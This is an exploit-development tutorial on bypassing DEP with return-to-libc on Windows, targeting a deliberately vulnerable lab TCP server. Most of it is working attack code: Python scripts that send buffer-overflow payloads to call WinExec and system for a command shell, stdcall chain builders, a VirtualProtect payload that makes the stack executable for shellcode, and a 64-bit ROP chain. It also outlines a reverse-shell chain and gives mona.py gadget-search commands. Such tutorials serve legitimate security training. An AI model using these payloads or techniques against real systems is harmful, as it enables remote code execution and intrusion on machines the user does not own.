Return-to-libc on Windows
In the Linux ret2libc article, we bypassed DEP by calling system("/bin/sh") from libc. The concept on Windows is identical — call existing functions instead of injecting shellcode — but the details differ: different libraries, different calling conventions, different target functions, and different tools.
If you’re coming from the Windows buffer overflow tutorial where we used x32dbg and disabled DEP with CFF Explorer, this article picks up where that left off — but now DEP stays on.
The Windows Landscape
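On Linux, the C runtime (libc) gives us system(). On Windows, the equivalent functions are spread across several system libraries. kernel32.dll and ntdll.dll are loaded into every Win32 process. msvcrt.dll and user32.dll are loaded into many, depending on what the program links against: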
| Library | Key Functions for ret2libc |
|---|---|
| kernel32.dll | WinExec(), CreateProcessA(), LoadLibraryA(), VirtualProtect() |
| msvcrt.dll | system(), _exec() — C runtime functions |
| ntdll.dll | Low-level NT API — NtProtectVirtualMemory(), etc. |
| user32.dll | MessageBoxA() — useful for proof of concept |
The easiest targets:
- WinExec("cmd.exe", 0): 2 arguments, launches a command. Simplest option.
- system("cmd.exe"): same as Linux, from msvcrt.dll. One argument.
- VirtualProtect(): make the stack executable, then jump to shellcode. More complex but more powerful.
We’ll start with WinExec because it’s the most straightforward.
Calling Conventions — The Critical Difference
This is where Windows and Linux diverge, and where most cross-platform exploit devs get confused.
32-bit: stdcall vs cdecl
On Linux, most functions use cdecl — arguments pushed right-to-left, caller cleans the stack.
On Windows, most Win32 API functions use stdcall — arguments pushed right-to-left, callee cleans the stack.
Why does this matter? After WinExec returns (stdcall), it pops its own arguments off the stack. ESP is in a different position than it would be after a cdecl function. This changes how we chain calls.
cdecl (Linux libc):
On entry: ESP → [ret_addr] [arg1] [arg2]
After return: ESP → [arg1] [arg2] ← Caller must clean up
stdcall (Windows API):
On entry: ESP → [ret_addr] [arg1] [arg2]
After return: ESP → (past arg2) ← Callee already cleaned up (ret 8)
For a single ret2libc call, this difference doesn’t matter much — the function returns to whatever address was on the stack. But for chaining multiple calls, stdcall is actually easier — the callee cleans up, so we don’t need pop; ret gadgets between calls.
msvcrt.dll’s system() uses cdecl (it’s a C runtime function, not a Win32 API). So system() on Windows behaves exactly like on Linux. WinExec() uses stdcall.
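In numbers, the difference is how far ESP moves when the function returns. Here is a tiny worked example. It assumes 4-byte arguments and measures ESP on entry, when it points at the return address. A cdecl function's plain ret moves ESP by 4. A stdcall function's ret N moves it by 4 + N, where N is 4 times the argument count. The helper name is ours.

```python
def esp_after_return(esp_at_entry: int, nargs: int, stdcall: bool) -> int:
    """ESP right after the function's ret executes (32-bit, 4-byte arguments)."""
    popped = 4                  # ret always pops the return address
    if stdcall:
        popped += 4 * nargs     # ret N also discards the arguments
    return esp_at_entry + popped


# A 2-argument call entered with ESP = 0x0022F9B4
print(hex(esp_after_return(0x0022F9B4, 2, stdcall=False)))  # 0x22f9b8 (cdecl)
print(hex(esp_after_return(0x0022F9B4, 2, stdcall=True)))   # 0x22f9c0 (stdcall)
```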
64-bit: Microsoft x64 Calling Convention
On 64-bit Windows, the first 4 arguments go in registers RCX, RDX, R8, R9 (not RDI, RSI like Linux). And there’s a twist: the caller must reserve 32 bytes of shadow space on the stack, even if the function has fewer than 4 arguments.
Microsoft x64:
RCX = arg 1
RDX = arg 2
R8 = arg 3
R9 = arg 4
Stack: [shadow 32 bytes] [arg 5] [arg 6] ...
Linux System V x64:
RDI = arg 1
RSI = arg 2
RDX = arg 3
RCX = arg 4
R8 = arg 5
R9 = arg 6
The shadow space is the main gotcha. The callee is free to write into those 32 bytes. If you don't reserve them, it overwrites whatever sits there, which in an exploit is usually the rest of your chain. We'll cover this in the 64-bit section.
Setting Up the Lab
Same vulnerable TCP server from the Windows buffer overflow tutorial:
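#include <winsock2.h>
#include <stdio.h>

void handle_client(SOCKET client) {
    char buffer[512];
    int recv_size;
    recv_size = recv(client, buffer, 1024, 0); // Overflow! Up to 1024 bytes into a 512-byte buffer
    buffer[recv_size] = '\0';                  // Also out of bounds once recv_size >= 512
    printf("Received: %s\n", buffer);
    closesocket(client);
}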
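The payloads below use 528 bytes of padding to reach the saved return address. That number comes from the lab binary's frame layout and will differ between builds.

One way to confirm it, assuming you can read EIP in x32dbg after the crash, is a cyclic pattern in the style of Metasploit's pattern_create. The sketch below is a minimal version. The helper names are ours, not a library API.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Cyclic pattern of upper/lower/digit triplets: Aa0Aa1Aa2..."""
    triplets = [u + l + d
                for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits]
    pattern = "".join(triplets)
    if length > len(pattern):
        raise ValueError("pattern too long to stay unique")
    return pattern[:length].encode()


def pattern_offset(eip_value: int, length: int = 1024) -> int:
    """Offset of the 4 bytes that landed in EIP (little-endian), or -1."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


pattern = pattern_create(1024)
# Send `pattern` instead of the "A" padding, then read EIP in x32dbg after the crash.
# Here we fake the crash by reading the 4 bytes at offset 528 as if they were EIP.
fake_eip = struct.unpack("<I", pattern[528:532])[0]
print(pattern_offset(fake_eip))  # 528
```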
Environment:
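- Windows 7 32-bit (target)
- DEP enabled (we do NOT disable it this time)
- ASLR disabled for the server binary (via CFF Explorer: set DllCharacteristics to 0x0100 for DEP-only, not 0x0000)
- x32dbg for debugging

To keep ASLR off but DEP on, set DllCharacteristics to 0x0100 (NX_COMPAT only, no DYNAMIC_BASE). This only affects the server's own image. On Windows 7, system DLLs such as kernel32.dll and msvcrt.dll are still rebased once per boot, so the addresses you find below stay valid only until the target reboots.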
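CFF Explorer is editing a single 16-bit field in the PE optional header. Below is a minimal stdlib sketch of the same edit. It assumes a well-formed PE32 or PE32+ file. DllCharacteristics sits 70 bytes into the optional header in both formats; NX_COMPAT is 0x0100 and DYNAMIC_BASE is 0x0040. The function names are ours. The sketch does not update the PE checksum, which is generally only enforced for drivers.

```python
import struct

NX_COMPAT = 0x0100      # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE


def dll_characteristics_offset(image: bytes) -> int:
    """File offset of OptionalHeader.DllCharacteristics."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20   # skip "PE\0\0" and IMAGE_FILE_HEADER
    return optional_header + 70           # same offset in PE32 and PE32+


def make_dep_only(image: bytes) -> bytes:
    """Set NX_COMPAT (DEP on) and clear DYNAMIC_BASE (no ASLR for this image)."""
    off = dll_characteristics_offset(image)
    flags = struct.unpack_from("<H", image, off)[0]
    flags = (flags | NX_COMPAT) & ~DYNAMIC_BASE
    patched = bytearray(image)
    struct.pack_into("<H", patched, off, flags)
    return bytes(patched)
```

To use it:
- Read the server binary in binary mode.
- Pass the bytes through make_dep_only.
- Write the result to a new file.
- Confirm the flags in CFF Explorer before testing.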
Finding Addresses with x32dbg
Launch the vulnerable server inside x32dbg. Once the process is running, we need to find our target functions and strings.
Finding WinExec
WinExec lives in kernel32.dll. In x32dbg:
- Go to the Symbols tab
- Select kernel32.dll from the module list
- Search for “WinExec” in the search bar
- Note the address
Or press Ctrl+G and type kernel32:WinExec. x32dbg resolves module:export expressions and jumps straight to the function.
Let’s say we find: WinExec = 0x7C8623AD (this varies by Windows version and patch level).
Finding system() in msvcrt.dll
If msvcrt.dll is loaded (it is for most C programs):
- Symbols tab → select msvcrt.dll
- Search for “system”
Let’s say: system = 0x77C293C7
Finding “cmd.exe” String
We need the string "cmd.exe" somewhere in readable memory. Options:
Option A: Search loaded modules
x32dbg → Memory Map tab → Right-click a module → Search for → String references → search “cmd”
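Many Windows DLLs contain the string "cmd.exe" or "cmd" internally. If you find one, note its address and check that the match is followed by a null byte. WinExec reads until the first 0x00, so "cmd.exe" embedded in a longer string won't work as-is.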
Option B: Search the whole process memory
x32dbg> findallmem 0, 636D642E65786500
(the hex bytes of "cmd.exe" plus its null terminator)
Option C: Use our buffer
We can place “cmd.exe” in our overflow payload and reference it by its stack address. This is less reliable (stack address changes), but works when ASLR is off.
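For Option C, the string's address is simply the stack address where it lands. The sketch below assumes ESP is 0x0022F9B0 when the vulnerable ret executes, which is the value from the x32dbg session later in this article; yours will differ. It reuses this article's example WinExec and ExitProcess addresses.

Placing the string right after WinExec's two arguments puts it 16 bytes above that ESP. The function name is hypothetical.

```python
import struct

p = lambda x: struct.pack("<I", x)   # 32-bit little-endian


def winexec_payload_with_stack_string(esp_at_ret: int, offset: int = 528) -> bytes:
    winexec = 0x7C8623AD      # example WinExec address from this article
    exit_proc = 0x7C81CAFA    # example ExitProcess address from this article
    # At the vulnerable ret, ESP points at the WinExec slot. Four dwords follow
    # (WinExec, ExitProcess, lpCmdLine, uCmdShow), so the string starts 16 bytes up.
    cmd_addr = esp_at_ret + 16
    payload = b"A" * offset
    payload += p(winexec)       # overwritten return address
    payload += p(exit_proc)     # WinExec's return address
    payload += p(cmd_addr)      # lpCmdLine -> our own string below
    payload += p(1)             # uCmdShow = SW_SHOWNORMAL
    payload += b"cmd.exe\x00"   # null-terminated command string
    return payload


payload = winexec_payload_with_stack_string(0x0022F9B0)
```

The server reads with recv(), so the null bytes in the stack address and in the terminator are not bad characters here. A strcpy-based overflow would be a different story.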
Let’s say we find "cmd.exe" at 0x7C8369B0 inside kernel32.dll.
Finding exit() or ExitProcess()
For clean termination:
ExitProcess in kernel32.dll: 0x7C81CAFA
Exploit 1: WinExec(“cmd.exe”, 0) — 32-bit stdcall
WinExec has two parameters:
UINT WinExec(
LPCSTR lpCmdLine, // Command to execute ("cmd.exe")
UINT uCmdShow // Window display (0 = SW_HIDE, 1 = SW_SHOWNORMAL)
);
Because stdcall arguments are pushed right-to-left, lpCmdLine ends up at the lower address, just above the return address. Normally the caller pushes the arguments and then executes call, which pushes the return address. We arrive via ret instead of call, so we have to build that same picture ourselves. From WinExec's perspective when it starts:
ESP → [return address after WinExec]
ESP+4 [lpCmdLine = "cmd.exe" pointer]
ESP+8 [uCmdShow = 0 or 1]
This is the same layout as Linux ret2libc, just with an extra argument.
The Payload
import socket
import struct
p = lambda x: struct.pack("<I", x)
ip = "192.168.64.15"
port = 9999
offset = 528 # padding to EIP (524 to EBP + 4 for EBP)
winexec = p(0x7C8623AD) # WinExec in kernel32.dll
exit_proc = p(0x7C81CAFA) # ExitProcess in kernel32.dll
cmd_str = p(0x7C8369B0) # "cmd.exe" string in kernel32.dll
show_window = p(0x00000001) # SW_SHOWNORMAL (1) — so we can see the cmd window
# Stack layout after ret:
# [padding] [WinExec] [ExitProcess] [cmd_str] [show_window]
# ↑ EIP ↑ return addr ↑ arg1 ↑ arg2
payload = b"A" * offset
payload += winexec # Overwrite EIP → jump to WinExec
payload += exit_proc # WinExec's return address → ExitProcess
payload += cmd_str # arg1: lpCmdLine = "cmd.exe"
payload += show_window # arg2: uCmdShow = 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendall(payload)
s.close()
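One detail about stdcall cleanup: WinExec ends with ret 8. Its ret pops ExitProcess into EIP, then discards both arguments (8 bytes), leaving ESP just past show_window. ExitProcess treats the dword there as its own return address and the next one as uExitCode. Both are whatever follows our payload on the stack, so the exit code is arbitrary. That doesn't matter, because ExitProcess never returns and the process still terminates cleanly.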
For a single call, this just works.
Debugging in x32dbg
Set a breakpoint at the ret instruction of the vulnerable function. Send the payload.
x32dbg breakpoint hit.
Registers:
EIP = 0x0040xxxx (about to execute ret, inside the server at its default 0x00400000 image base)
ESP = 0x0022F9B0
Stack at ESP:
0x0022F9B0: 0x7C8623AD ← WinExec (will be popped into EIP)
0x0022F9B4: 0x7C81CAFA ← ExitProcess (WinExec's return address)
0x0022F9B8: 0x7C8369B0 ← "cmd.exe" pointer (arg1)
0x0022F9BC: 0x00000001 ← SW_SHOWNORMAL (arg2)
Step into the ret:
EIP = 0x7C8623AD (WinExec!)
ESP = 0x0022F9B4 (past the popped address)
WinExec reads:
- [ESP] = 0x7C81CAFA → return address (ExitProcess)
- [ESP+4] = 0x7C8369B0 → dereferences to "cmd.exe"
- [ESP+8] = 0x00000001 → SW_SHOWNORMAL
Continue execution → cmd.exe window appears.
Exploit 2: system(“cmd.exe”) via msvcrt.dll
If msvcrt.dll is loaded, we can use system() — which uses cdecl, behaving exactly like Linux.
# Reuses the imports, p, offset, ip and port from Exploit 1
system_addr = p(0x77C293C7) # system() in msvcrt.dll
exit_proc = p(0x7C81CAFA) # ExitProcess
cmd_str = p(0x7C8369B0) # "cmd.exe"
payload = b"A" * offset
payload += system_addr # EIP → system()
payload += exit_proc # system's return address → ExitProcess
payload += cmd_str # system's argument: "cmd.exe"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendall(payload)
s.close()
Identical layout to Linux ret2libc. cdecl is cdecl regardless of OS.
Chaining Functions — stdcall Makes It Easier
Here’s where stdcall actually helps us. Since the callee cleans up its own arguments, we don’t need pop; ret gadgets between calls.
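Example: call LoadLibraryA("ws2_32.dll"), then WinExec("cmd.exe", 1), then ExitProcess:
stdcall chain:
[padding] [LoadLibraryA] [WinExec] [ptr "ws2_32.dll"] [ExitProcess] [ptr "cmd.exe"] [1]
↑ EIP ↑ LoadLib return ↑ LoadLib arg1 ↑ WinExec return ↑ WinExec arg1 ↑ arg2
After LoadLibraryA returns (ret 4):
- ret pops the WinExec address into EIP
- the 4-byte cleanup skips the "ws2_32.dll" pointer
- ESP now points to the ExitProcess slot, which WinExec treats as its return address, with "cmd.exe" and 1 at ESP+4 and ESP+8, exactly where it expects them

The general pattern is [f1] [f2] [f1's args] [f3] [f2's args] ... Each function's address is followed by the next function's address (its return address), then its own arguments. No gadgets needed: stdcall's cleanup behavior naturally chains function calls.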
Compare to cdecl (Linux):
cdecl chain (needs pop;ret gadgets):
[padding] [setuid] [pop;ret] [0] [system] [exit] ["/bin/sh"]
On Linux, we needed a pop; ret gadget to clean up setuid’s argument before system(). On Windows with stdcall, the function does it for us.
The catch: The number of arguments must match exactly. If a stdcall function expects 2 arguments, it pops 8 bytes. If you get the argument count wrong, the stack is misaligned and the chain breaks.
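Because the argument counts must match exactly, it helps to check a chain offline before sending it. Below is a minimal sketch that assumes 4-byte slots and stdcall functions throughout:
- build_stdcall_chain places each function's return address (the next function) directly before that function's own arguments.
- simulate_stdcall replays the ret N cleanup to show what each function actually receives.

LOADLIBRARYA and WS2_32_STR are hypothetical placeholder addresses. The other constants are this article's example values.

```python
import struct


def build_stdcall_chain(calls, final_ret):
    """calls: list of (function_address, [dword args]) in execution order.
    final_ret: where the last function returns (e.g. ExitProcess)."""
    slots = [calls[0][0]]                 # overwrites the saved return address
    for i, (_, args) in enumerate(calls):
        next_addr = calls[i + 1][0] if i + 1 < len(calls) else final_ret
        slots.append(next_addr)           # this function's return address
        slots.extend(args)                # its arguments; it pops them itself (ret 4*n)
    return slots


def simulate_stdcall(slots, nargs):
    """nargs maps function address -> argument count.
    Returns (function, return_address, args) per function, in execution order."""
    seen = []
    eip, esp = slots[0], 1                # the vulnerable function's ret pops slot 0
    while eip in nargs:
        n = nargs[eip]
        ret_addr = slots[esp]
        args = slots[esp + 1:esp + 1 + n]
        seen.append((eip, ret_addr, args))
        eip = ret_addr                    # ret 4*n pops the return address...
        esp += 1 + n                      # ...then discards the n arguments
    return seen


LOADLIBRARYA = 0x11110000   # hypothetical
WS2_32_STR = 0x22220000     # hypothetical pointer to "ws2_32.dll"
WINEXEC, EXITPROCESS, CMD_STR = 0x7C8623AD, 0x7C81CAFA, 0x7C8369B0

slots = build_stdcall_chain([(LOADLIBRARYA, [WS2_32_STR]), (WINEXEC, [CMD_STR, 1])], EXITPROCESS)
payload = b"A" * 528 + b"".join(struct.pack("<I", s) for s in slots)
for func, ret_addr, args in simulate_stdcall(slots, {LOADLIBRARYA: 1, WINEXEC: 2}):
    print(hex(func), "returns to", hex(ret_addr), "with args", [hex(a) for a in args])
```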
Exploit 3: Reverse Shell — Chaining Multiple Calls
For a remote exploit, a cmd.exe window on the target machine isn’t useful — we need a reverse shell. This requires chaining several calls to load WinSock and connect back to us.
This gets complex enough that ROP is usually the better approach. But here’s the conceptual chain:
1. LoadLibraryA("ws2_32.dll") → Load WinSock library
2. WSAStartup(0x0202, &wsadata) → Initialize WinSock
3. WSASocketA(2, 1, 0, 0, 0, 0) → Create a TCP socket
4. connect(sock, &sockaddr, 16) → Connect to attacker
5. CreateProcessA(NULL, "cmd.exe", ..., &startupinfo, ...) → Spawn cmd with redirected I/O
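Each function has multiple arguments, and CreateProcessA has 10 parameters. Worse, the calls depend on each other. WSASocketA returns the socket handle in EAX, and that value has to be passed to connect and placed in the STARTUPINFO handles for CreateProcessA. A pure ret2libc chain only supplies constants written into the payload, so it has no direct way to forward a return value. Moving values between registers and stack slots at runtime is exactly what ROP chains provide.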
For practical remote exploitation on Windows, the typical approach is:
ret2libc: VirtualProtect(stack, 0x1000, PAGE_EXECUTE_READWRITE, &old)
↓
Stack is now executable
↓
Jump to shellcode on the stack (reverse shell shellcode from msfvenom)
This combines ret2libc (one function call to disable DEP for our stack region) with traditional shellcode execution.
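Here is a minimal sketch of that single call as a 32-bit stdcall ret2libc payload. It assumes ASLR is off, so the stack address is fixed. VirtualProtect returns with ret 16, so we set its return address to the shellcode itself. Once the page is executable, VirtualProtect "returns" straight into it.

Every address here is a placeholder:
- virtualprotect_addr must come from kernel32.dll on your target.
- esp_at_ret comes from x32dbg.
- writable_addr is a hypothetical address in a writable section (for example the server's .data) where VirtualProtect can store the old protection value.

The single 0xCC byte (int3) stands in for real shellcode. Hitting it in x32dbg confirms execution reached the stack.

```python
import struct

p = lambda x: struct.pack("<I", x)   # 32-bit little-endian

PAGE_EXECUTE_READWRITE = 0x40


def virtualprotect_payload(virtualprotect_addr, esp_at_ret, writable_addr,
                           shellcode, offset=528, size=0x1000):
    # At the vulnerable ret, ESP points at the VirtualProtect slot. Six dwords
    # (VirtualProtect, return address, 4 arguments) precede the shellcode,
    # so it begins 24 bytes above that ESP.
    shellcode_addr = esp_at_ret + 6 * 4
    payload = b"A" * offset
    payload += p(virtualprotect_addr)     # overwritten return address
    payload += p(shellcode_addr)          # VirtualProtect returns into the shellcode
    payload += p(shellcode_addr)          # lpAddress: page(s) holding the shellcode
    payload += p(size)                    # dwSize
    payload += p(PAGE_EXECUTE_READWRITE)  # flNewProtect
    payload += p(writable_addr)           # lpflOldProtect: must point to writable memory
    payload += shellcode
    return payload


# Hypothetical VirtualProtect and .data addresses; int3 as stand-in shellcode
payload = virtualprotect_payload(0x11111111, 0x0022F9B0, 0x00405000, b"\xcc")
print(len(payload))  # 553
```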
64-bit Windows — The Shadow Space Problem
On 64-bit Windows, the calling convention is Microsoft x64 fastcall:
- First 4 arguments: RCX, RDX, R8, R9
- The caller must allocate 32 bytes of shadow space on the stack before the call
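- Additional arguments go on the stack after the shadow space
- RSP must be 16-byte aligned at the call instruction, so on function entry (after the return address is pushed) RSP % 16 == 8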
Stack layout for a function call (64-bit Windows):
RSP → [return address]
RSP+8 [shadow space: 32 bytes (even if unused)]
RSP+40 [5th argument, if any]
RSP+48 [6th argument, if any]
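The shadow space exists so the callee can spill the register arguments to the stack if needed. The callee assumes those 32 bytes belong to it. If the caller didn't reserve them, the callee overwrites whatever lives there (in an exploit, usually the next entries of your chain), and execution typically crashes soon after.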
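The layout above fits in a few lines of code. This sketch assumes the standard rules:
- The first four integer/pointer arguments go in RCX, RDX, R8 and R9.
- Later arguments sit at RSP+40 (0x28), RSP+48 (0x30), and so on, on entry.
- RSP % 16 == 8 once the return address has been pushed.

The helper names are ours.

```python
REGISTER_ARGS = ("RCX", "RDX", "R8", "R9")
SHADOW_SPACE = 32


def ms_x64_arg_location(index: int) -> str:
    """Where argument `index` (1-based, integer/pointer) lives on entry to the callee."""
    if index < 1:
        raise ValueError("arguments are numbered from 1")
    if index <= 4:
        return REGISTER_ARGS[index - 1]
    # return address (8 bytes) + shadow space (32 bytes) + earlier stack arguments
    offset = 8 + SHADOW_SPACE + 8 * (index - 5)
    return f"[RSP+{offset:#x}]"


def entry_rsp_is_aligned(rsp_at_entry: int) -> bool:
    """True if RSP looks like it did right after a properly aligned call."""
    return rsp_at_entry % 16 == 8


for i in range(1, 7):
    print(i, ms_x64_arg_location(i))
```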
ret2libc on 64-bit Windows
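We need gadgets to:
- Load RCX with the first argument (pop rcx; ret)
- Load RDX with the second argument (pop rdx; ret)
- Provide 32 bytes of shadow space right after the function's return address, and skip over it afterwards (e.g. an add rsp, 0x20; ret gadget as the return address)
- Keep RSP 16-byte aligned (an extra ret gadget shifts it by 8)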
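from struct import pack
p64 = lambda x: pack("<Q", x)  # pack a 64-bit little-endian value
offset = 72  # varies per binary
# All addresses are placeholders; pop_rdx and add_rsp_20 are hypothetical gadgets
pop_rcx = p64(0x00007FFA1234ABCD)  # pop rcx; ret (from a loaded DLL)
pop_rdx = p64(0x00007FFA1234ABD0)  # pop rdx; ret (hypothetical)
ret = p64(0x00007FFA1234ABCE)  # ret gadget (alignment)
add_rsp_20 = p64(0x00007FFA1234ABE0)  # add rsp, 0x20; ret (hypothetical, skips shadow space)
cmd_str = p64(0x00007FFA56789012)  # "cmd.exe" string address
winexec = p64(0x00007FFA11223344)  # WinExec address
exit_p = p64(0x00007FFA55667788)  # ExitProcess
payload = b"A" * offset
payload += pop_rcx + cmd_str  # RCX = lpCmdLine ("cmd.exe")
payload += pop_rdx + p64(1)  # RDX = uCmdShow (SW_SHOWNORMAL)
payload += ret  # Alignment: RSP % 16 == 8 at WinExec entry, if the overwritten slot is 8 mod 16
payload += winexec  # "Call" WinExec via ret
payload += add_rsp_20  # WinExec's return address: hop over the shadow space
payload += b"B" * 32  # 32 bytes of shadow space WinExec may overwrite
payload += pop_rcx + p64(0)  # RCX = uExitCode
payload += exit_p  # ExitProcess(0); its return slot and shadow space lie past the payload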
In practice, 64-bit Windows ret2libc almost always requires ROP gadgets to set up registers — the line between ret2libc and ROP disappears entirely on 64-bit.
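Because every gadget moves RSP, it is easy to lose track of alignment. This minimal sketch replays a chain of 8-byte slots symbolically and reports RSP at each API entry. The gadget names and their effects are hypothetical stand-ins for whatever ROPgadget or ropper finds in your DLLs. The simulator ignores everything the APIs do besides returning. It assumes the overwritten return-address slot is itself 8 mod 16, as it would be after a normal call.

```python
# Extra RSP movement each gadget makes after its own ret pops it (hypothetical gadget set)
GADGETS = {
    "pop rcx; ret": 8,
    "pop rdx; ret": 8,
    "ret": 0,
    "add rsp, 0x20; ret": 0x20,
}
APIS = {"WinExec", "ExitProcess"}
NO_RETURN = {"ExitProcess"}


def api_entry_rsp(chain, slot_addr):
    """Replay `chain` (gadget/API names and integer data) from slot_addr, the
    address of the overwritten return address. Returns {api_name: RSP on entry}."""
    entries = {}
    rsp = slot_addr
    while True:
        index = (rsp - slot_addr) // 8
        if index >= len(chain):
            raise ValueError("chain ran off the end of the payload")
        target = chain[index]
        rsp += 8                       # a ret pops this slot into RIP
        if target in APIS:
            entries[target] = rsp      # RSP now points at the API's return address
            if target in NO_RETURN:
                return entries
        elif target in GADGETS:
            rsp += GADGETS[target]
        else:
            raise ValueError(f"slot {index} would execute data: {target!r}")


chain = [
    "pop rcx; ret", 0x7FFA56789012,   # RCX = placeholder "cmd.exe" address
    "pop rdx; ret", 1,                # RDX = SW_SHOWNORMAL
    "ret",                            # alignment
    "WinExec",
    "add rsp, 0x20; ret",             # WinExec's return address: skip shadow space
    0, 0, 0, 0,                       # 32 bytes of shadow space
    "pop rcx; ret", 0,                # RCX = exit code
    "ExitProcess",
]
for name, rsp in api_entry_rsp(chain, 0x14FE08).items():
    print(name, hex(rsp), "aligned" if rsp % 16 == 8 else "MISALIGNED")
```

Deleting the lone "ret" slot from the chain shifts both entries by 8, and the simulator then reports them as misaligned.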
Finding Addresses in x32dbg — Quick Reference
Finding functions:
Symbols tab → Select module (kernel32, msvcrt, ntdll)
→ Search for function name
→ Note the address
Finding strings:
Memory Map → Right-click module → Search for → String references
Or: CPU tab → Right-click → Search for → All referenced strings
Finding gadgets (for chaining):
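Use ROPgadget or ropper externally, against a copy of the DLL taken from the target machine:
$ ROPgadget --binary kernel32.dll --only "pop|ret" | grep "pop ecx"
$ ropper --file kernel32.dll --search "pop ecx"
Addresses are reported relative to the DLL's preferred image base. Rebase them if the DLL loaded elsewhere.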
Setting breakpoints:
Command bar: bp 0x7C8623AD (break on WinExec)
Or: Ctrl+G → enter address → F2
Examining the stack:
Stack panel shows ESP and values
Or: dump at ESP in the hex dump panel
Checking DEP status:
Memory Map tab → check the protection of the stack region
Stack pages should be read/write only, with no execute permission
Comparison — Linux vs Windows ret2libc
| Aspect | Linux | Windows |
|---|---|---|
| Target function | system("/bin/sh") |
WinExec("cmd.exe", 1) or system("cmd.exe") |
| Library | libc.so | kernel32.dll, msvcrt.dll |
| 32-bit convention | cdecl (caller cleans) | stdcall (callee cleans) for API, cdecl for CRT |
| 64-bit convention | System V (rdi, rsi, rdx) | MS x64 (rcx, rdx, r8, r9 + 32-byte shadow) |
| Chaining (32-bit) | Needs pop; ret between calls |
stdcall chains naturally (callee cleans) |
| String availability | “/bin/sh” in libc | “cmd.exe” sometimes in kernel32 (search required) |
| Debugger | GDB | x32dbg / x64dbg |
| DEP control | Compile flags / sysctl | PE header DllCharacteristics |
| Gadget tools | ROPgadget, ropper | ROPgadget, ropper, mona.py (Immunity) |
The fundamental technique is the same. You’re overwriting the return address with a function pointer and arranging arguments on the stack. The OS-specific details are calling conventions, target functions, and tooling.
When ret2libc Isn’t Enough
Just like on Linux, Windows ret2libc has limitations:
- Complex payloads (reverse shells) require too many chained calls
- 64-bit requires register gadgets anyway (it’s already ROP)
- ASLR randomizes kernel32.dll and msvcrt.dll base addresses
The most common Windows DEP bypass in practice:
ROP chain → VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old)
→ Stack is now executable
→ Jump to shellcode on the stack
When the stack address isn't known in advance, or the arguments contain bad characters, you need a full ROP chain to compute VirtualProtect's 4 arguments at runtime. The result is powerful: once DEP is disabled for your stack region, you get unrestricted code execution via shellcode.
For building Windows ROP chains, mona.py (a plugin for Immunity Debugger) is the gold standard:
!mona rop -m kernel32.dll,msvcrt.dll
!mona rop -m * -cpb "\x00\x0a\x0d"
It automatically finds gadgets and generates VirtualProtect / VirtualAlloc ROP chains.
Final Thoughts
ret2libc on Windows follows the same principle as Linux — reuse existing code to bypass DEP. The main differences are the calling conventions (stdcall vs cdecl, shadow space on 64-bit) and the target functions (WinExec, CreateProcess, VirtualProtect instead of system and execve).
If you’re comfortable with the Linux ret2libc and the Windows buffer overflow, this article bridges the two. The next step — building full ROP chains on Windows — is where the real power lies, especially the VirtualProtect technique that re-enables shellcode execution.
Happy reversing!